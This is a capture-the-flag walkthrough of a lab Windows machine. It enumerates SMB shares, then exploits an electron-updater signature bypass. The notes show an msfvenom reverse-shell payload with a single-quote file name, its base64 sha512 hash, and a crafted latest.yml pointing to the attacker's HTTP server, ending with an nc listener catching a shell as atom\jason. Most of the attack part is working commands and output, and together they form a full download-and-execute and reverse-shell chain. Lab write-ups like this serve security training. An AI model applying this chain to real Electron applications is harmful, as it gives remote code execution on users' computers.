2 :139 :445 smb
$ nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.237
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-01 15:21 PDT
Nmap scan report for 10.10.10.237
Host is up (0.072s latency).
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.237\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.237\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.237\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: <none>
| Current user access: READ/WRITE
| \\10.10.10.237\Software_Updates:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ/WRITE
Nmap done: 1 IP address (1 host up) scanned in 39.90 seconds
$ smbclient //10.10.10.237/Software_Updates
Enter WORKGROUP\kashz's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat May 1 15:36:52 2021
.. D 0 Sat May 1 15:36:52 2021
client1 D 0 Sat May 1 15:35:46 2021
client2 D 0 Sat May 1 15:35:46 2021
client3 D 0 Sat May 1 15:35:46 2021
UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 04:18:08 2021
http://10.10.10.237/releases/heed_setup_v1.0.0.zip
contains .exe installer
UAT_Testing_Procedures.pdf
Note taking application built with electron-builder
There’s no server interaction when creating notes. = no need to reverse engineer the binary
To initiate the QA process, just place the updates in one of the "client" folders, and the appropriate QA team will test it to ensure it finds an update and installs it correctly = we can try getting reverse shell using this
Electron builder exploit on Google takes us to https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
RCE can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64).
# generating shell using msfvenom with a single quote in filename
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=6969 -e "x86/shikata_ga_nai" -f exe -o "r'evx.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: r'evx.exe
# generating shasum
$ shasum -a 512 "r'evx.exe"| cut -d " " -f 1 | xxd -r -p | base64
fA8Brc+usPtwvAHR64r8b+A1eedKvJg5egb1eeTl3XrJLbPdTvIyG2zvbDLWQ9iP3WFvevshJ42C4Pa57E6etA==
$ file "heedv1 Setup 1.0.0.exe"
heedv1 Setup 1.0.0.exe: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
# creating latest.yaml file
version: 1.1.0
path: http://10.10.14.15/r'evx.exe
sha512: fA8Brc+usPtwvAHR64r8b+A1eedKvJg5egb1eeTl3XrJLbPdTvIyG2zvbDLWQ9iP3WFvevshJ42C4Pa57E6etA==
# put latest.yml in client1
(terminal-x)
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.237 - - [03/May/2021 16:22:14] code 404, message File not found
10.10.10.237 - - [03/May/2021 16:22:14] "GET /r'evx.exe.blockmap HTTP/1.1" 404 -
10.10.10.237 - - [03/May/2021 16:22:14] "GET /r%27evx.exe HTTP/1.1" 200 -
(terminal-y)
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.237] 62563
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
atom\jason
Last updated